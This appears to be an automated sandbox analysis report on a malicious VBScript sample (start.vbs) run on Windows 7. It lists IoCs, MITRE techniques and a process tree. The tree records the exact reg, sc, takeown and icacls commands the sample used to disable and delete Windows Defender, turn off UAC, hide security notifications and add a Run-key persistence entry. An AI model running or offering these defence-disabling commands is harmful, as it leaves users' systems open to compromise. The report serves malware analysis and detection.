6fd5bbf8500d720504c57b9a142e2e74cf72fca61423c16a47925c7dcfc58f55

Analysis

max time kernel
189s
max time network
223s
platform
windows7_x64
resource
win7-20221111-en
resource tags

arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system
submitted
05/12/2022, 08:57 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

start.vbs
Size

121B
MD5

13999a2016dfac9c53e075de38b567d0
SHA1

835531d5a396499dc0cd075f443a6a624a3b631c
SHA256

777e6f4dd1604ca00b326a5095dc593c71b1250091cd1ff629202b8c669fd5c7
SHA512

3e8b9ab49dd854d7ee7e0903277fc892befa38720c4f5b8afc9c452e6a648523a4446e07a7d5486b328669bcf762c2a674635e20e7099ca114d5b9b4ce9f5f24

Score

10^/10

discovery evasion exploit persistence trojan

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs 12 IoCs

evasion trojan

Modify Registry

T1112

Modify Existing Service

T1031

Disabling Security Tools

T1089

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	reg.exe

UAC bypass 3 TTPs 2 IoCs

evasion trojan

Bypass User Account Control

T1088

Disabling Security Tools

T1089

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe

Windows security bypass 2 TTPs 2 IoCs

evasion trojan

Disabling Security Tools

T1089

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	X3A.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes	X3A.exe

Creates new service(s) 1 TTPs
persistence

New Service
T1050
Disables taskbar notifications via registry modification
evasion

Executes dropped EXE 3 IoCs

pid	Process
1700	dismhost.exe
1744	tweak.exe
1604	X3A.exe

Modifies Windows Firewall 1 TTPs 21 IoCs

evasion

Modify Existing Service

T1031

pid	Process
1076	netsh.exe
1248	netsh.exe
1976	netsh.exe
1280	netsh.exe
1384	netsh.exe
1148	netsh.exe
188	netsh.exe
1080	netsh.exe
1112	netsh.exe
1312	netsh.exe
1796	netsh.exe
1764	netsh.exe
1072	netsh.exe
956	netsh.exe
1620	netsh.exe
780	netsh.exe
1752	netsh.exe
860	netsh.exe
1512	netsh.exe
584	netsh.exe
364	netsh.exe

Possible privilege escalation attempt 6 IoCs

exploit

pid	Process
1960	icacls.exe
568	icacls.exe
1176	takeown.exe
1688	takeown.exe
960	takeown.exe
1656	icacls.exe

Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

Loads dropped DLL 34 IoCs

pid	Process
1844	Dism.exe
1700	dismhost.exe
1700	dismhost.exe
1700	dismhost.exe
1700	dismhost.exe
1700	dismhost.exe
1700	dismhost.exe
1700	dismhost.exe
1700	dismhost.exe
1700	dismhost.exe
1700	dismhost.exe
1700	dismhost.exe
1700	dismhost.exe
1700	dismhost.exe
1700	dismhost.exe
1700	dismhost.exe
1700	dismhost.exe
1700	dismhost.exe
1700	dismhost.exe
1700	dismhost.exe
1700	dismhost.exe
1700	dismhost.exe
1700	dismhost.exe
1700	dismhost.exe
1700	dismhost.exe
1700	dismhost.exe
1700	dismhost.exe
1700	dismhost.exe
1700	dismhost.exe
1700	dismhost.exe
1700	dismhost.exe
1700	dismhost.exe
1700	dismhost.exe
676	cmd.exe

Modifies file permissions 1 TTPs 6 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
1176	takeown.exe
1688	takeown.exe
960	takeown.exe
1656	icacls.exe
1960	icacls.exe
568	icacls.exe

Windows security modification 2 TTPs 3 IoCs

evasion trojan

Disabling Security Tools

T1089

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	X3A.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions	X3A.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes	X3A.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	X3A.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Windows\CurrentVersion\Run\X3A = "C:\\Users\\Admin\\AppData\\Roaming\\explorer\\X3A.exe /AutoIt3ExecuteScript C:\\Users\\Admin\\AppData\\Roaming\\explorer\\explorer.cfg"	X3A.exe

Checks whether UAC is enabled 1 TTPs 1 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	X3A.exe

Drops file in Windows directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Logs\DISM\dism.log	Dism.exe
File opened for modification	C:\Windows\Logs\DISM\dism.log	dismhost.exe

Launches sc.exe 14 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
1248	sc.exe
580	sc.exe
1512	sc.exe
1220	sc.exe
1544	sc.exe
1748	sc.exe
1700	sc.exe
588	sc.exe
1148	sc.exe
1900	sc.exe
1940	sc.exe
1600	sc.exe
1596	sc.exe
980	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Modifies system certificate store 2 TTPs 6 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8	X3A.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	X3A.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13	X3A.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 0f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c1320000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	X3A.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 1900000001000000100000006cf252fec3e8f20996de5d4dd9aef424030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131d00000001000000100000004558d512eecb27464920897de7b66053140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc41560858910090000000100000016000000301406082b0601050507030406082b060105050703010b000000010000001e000000440053005400200052006f006f00740020004300410020005800330000000f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d20000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	X3A.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	X3A.exe

NTFS ADS 1 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Roaming\explorer\winmgmts:\root\CIMV2	X3A.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
1648	powershell.exe
1604	X3A.exe
1604	X3A.exe
1768	powershell.exe

Suspicious use of AdjustPrivilegeToken 8 IoCs

description	pid	Process
Token: SeBackupPrivilege	1844	Dism.exe
Token: SeRestorePrivilege	1844	Dism.exe
Token: SeTakeOwnershipPrivilege	1176	takeown.exe
Token: SeTakeOwnershipPrivilege	1688	takeown.exe
Token: SeTakeOwnershipPrivilege	960	takeown.exe
Token: SeDebugPrivilege	1648	powershell.exe
Token: SeTakeOwnershipPrivilege	1744	tweak.exe
Token: SeDebugPrivilege	1768	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 956 wrote to memory of 676	956	WScript.exe	28
PID 956 wrote to memory of 676	956	WScript.exe	28
PID 956 wrote to memory of 676	956	WScript.exe	28
PID 676 wrote to memory of 788	676	cmd.exe	30
PID 676 wrote to memory of 788	676	cmd.exe	30
PID 676 wrote to memory of 788	676	cmd.exe	30
PID 676 wrote to memory of 1512	676	cmd.exe	31
PID 676 wrote to memory of 1512	676	cmd.exe	31
PID 676 wrote to memory of 1512	676	cmd.exe	31
PID 676 wrote to memory of 584	676	cmd.exe	32
PID 676 wrote to memory of 584	676	cmd.exe	32
PID 676 wrote to memory of 584	676	cmd.exe	32
PID 584 wrote to memory of 1180	584	cmd.exe	33
PID 584 wrote to memory of 1180	584	cmd.exe	33
PID 584 wrote to memory of 1180	584	cmd.exe	33
PID 584 wrote to memory of 1296	584	cmd.exe	34
PID 584 wrote to memory of 1296	584	cmd.exe	34
PID 584 wrote to memory of 1296	584	cmd.exe	34
PID 676 wrote to memory of 856	676	cmd.exe	35
PID 676 wrote to memory of 856	676	cmd.exe	35
PID 676 wrote to memory of 856	676	cmd.exe	35
PID 856 wrote to memory of 1844	856	cmd.exe	37
PID 856 wrote to memory of 1844	856	cmd.exe	37
PID 856 wrote to memory of 1844	856	cmd.exe	37
PID 856 wrote to memory of 840	856	cmd.exe	36
PID 856 wrote to memory of 840	856	cmd.exe	36
PID 856 wrote to memory of 840	856	cmd.exe	36
PID 1844 wrote to memory of 1700	1844	Dism.exe	38
PID 1844 wrote to memory of 1700	1844	Dism.exe	38
PID 1844 wrote to memory of 1700	1844	Dism.exe	38
PID 676 wrote to memory of 1772	676	cmd.exe	39
PID 676 wrote to memory of 1772	676	cmd.exe	39
PID 676 wrote to memory of 1772	676	cmd.exe	39
PID 676 wrote to memory of 1280	676	cmd.exe	40
PID 676 wrote to memory of 1280	676	cmd.exe	40
PID 676 wrote to memory of 1280	676	cmd.exe	40
PID 676 wrote to memory of 860	676	cmd.exe	41
PID 676 wrote to memory of 860	676	cmd.exe	41
PID 676 wrote to memory of 860	676	cmd.exe	41
PID 676 wrote to memory of 1176	676	cmd.exe	42
PID 676 wrote to memory of 1176	676	cmd.exe	42
PID 676 wrote to memory of 1176	676	cmd.exe	42
PID 676 wrote to memory of 1688	676	cmd.exe	43
PID 676 wrote to memory of 1688	676	cmd.exe	43
PID 676 wrote to memory of 1688	676	cmd.exe	43
PID 676 wrote to memory of 960	676	cmd.exe	44
PID 676 wrote to memory of 960	676	cmd.exe	44
PID 676 wrote to memory of 960	676	cmd.exe	44
PID 676 wrote to memory of 1656	676	cmd.exe	45
PID 676 wrote to memory of 1656	676	cmd.exe	45
PID 676 wrote to memory of 1656	676	cmd.exe	45
PID 676 wrote to memory of 1960	676	cmd.exe	46
PID 676 wrote to memory of 1960	676	cmd.exe	46
PID 676 wrote to memory of 1960	676	cmd.exe	46
PID 676 wrote to memory of 568	676	cmd.exe	47
PID 676 wrote to memory of 568	676	cmd.exe	47
PID 676 wrote to memory of 568	676	cmd.exe	47
PID 676 wrote to memory of 580	676	cmd.exe	48
PID 676 wrote to memory of 580	676	cmd.exe	48
PID 676 wrote to memory of 580	676	cmd.exe	48
PID 676 wrote to memory of 1512	676	cmd.exe	49
PID 676 wrote to memory of 1512	676	cmd.exe	49
PID 676 wrote to memory of 1512	676	cmd.exe	49
PID 676 wrote to memory of 1600	676	cmd.exe	50

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1158

pid	Process
112	attrib.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\start.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:956
- C:\Windows\System32\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\explorer.bat" "
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:676
- - C:\Windows\system32\reg.exe
    reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages"
    3⤵
    PID:788
- - C:\Windows\system32\findstr.exe
    findstr /c:Defender
    3⤵
    PID:1512
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages" | findstr /c:Defender
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:584
  - - C:\Windows\system32\reg.exe
      reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages"
      4⤵
      PID:1180
  - - C:\Windows\system32\findstr.exe
      findstr /c:Defender
      4⤵
      PID:1296
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c dism /online /get-packages | findstr /c:Defender
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:856
  - - C:\Windows\system32\findstr.exe
      findstr /c:Defender
      4⤵
      PID:840
  - - C:\Windows\system32\Dism.exe
      dism /online /get-packages
      4⤵
      Loads dropped DLL
      Drops file in Windows directory
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:1844
    - - C:\Users\Admin\AppData\Local\Temp\02A53D9E-51E8-42F1-908C-4E3ED67440CF\dismhost.exe
        
        C:\Users\Admin\AppData\Local\Temp\02A53D9E-51E8-42F1-908C-4E3ED67440CF\dismhost.exe {5161E64A-8531-41E4-8B17-CBDC9909C690}
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Drops file in Windows directory
        
        PID:1700
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v SettingsPageVisibility /t REG_SZ /d "hide:windowsdefender" /f
    3⤵
    PID:1772
- - C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Systray" /v HideSystray /t "REG_DWORD" /d 1 /f
    3⤵
    PID:1280
- - C:\Windows\system32\reg.exe
    reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SecurityAndMaintenance" /v Enabled /t REG_DWORD /d 0 /f
    3⤵
    PID:860
- - C:\Windows\system32\takeown.exe
    takeown /f "C:\Windows\SystemApps\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:1176
- - C:\Windows\system32\takeown.exe
    takeown /f "C:\Windows\SystemApps\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\Assets"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:1688
- - C:\Windows\system32\takeown.exe
    takeown /f "C:\Windows\SystemApps\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\pris"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:960
- - C:\Windows\system32\icacls.exe
    icacls "C:\Windows\SystemApps\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy" /grant Admin:F
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:1656
- - C:\Windows\system32\icacls.exe
    icacls "C:\Windows\SystemApps\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\Assets" /grant Admin:F
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:1960
- - C:\Windows\system32\icacls.exe
    icacls "C:\Windows\SystemApps\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\pris" /grant Admin:F
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:568
- - C:\Windows\system32\sc.exe
    sc config WinDefend start= disabled
    3⤵
    - Launches sc.exe
    PID:580
- - C:\Windows\system32\sc.exe
    sc stop windefend
    3⤵
    - Launches sc.exe
    PID:1512
- - C:\Windows\system32\sc.exe
    sc delete windefend
    3⤵
    - Launches sc.exe
    PID:1600
- - C:\Windows\system32\reg.exe
    reg ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "HideSCAHealth" /t "REG_DWORD" /d 0x1 /f
    3⤵
    PID:1900
- - C:\Windows\system32\reg.exe
    reg ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\PushNotifications" /v "ToastEnabled" /t "REG_DWORD" /d 0 /f
    3⤵
    PID:1204
- - C:\Windows\system32\reg.exe
    reg ADD "HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Explorer" /v "DisableNotificationCenter" /t "REG_DWORD" /d 1 /f
    3⤵
    PID:1296
- - C:\Windows\system32\reg.exe
    reg ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t "REG_DWORD" /d 0 /f
    3⤵
    - UAC bypass
    PID:1920
- - C:\Windows\system32\reg.exe
    reg ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t "REG_DWORD" /d 1 /f
    3⤵
    PID:1032
- - C:\Windows\system32\reg.exe
    reg ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender" /v "DisableRoutinelyTakingAction" /t "REG_DWORD" /d 1 /f
    3⤵
    PID:908
- - C:\Windows\system32\reg.exe
    reg ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender" /v "DisableRealtimeMonitoring" /t "REG_DWORD" /d 1 /f
    3⤵
    PID:1112
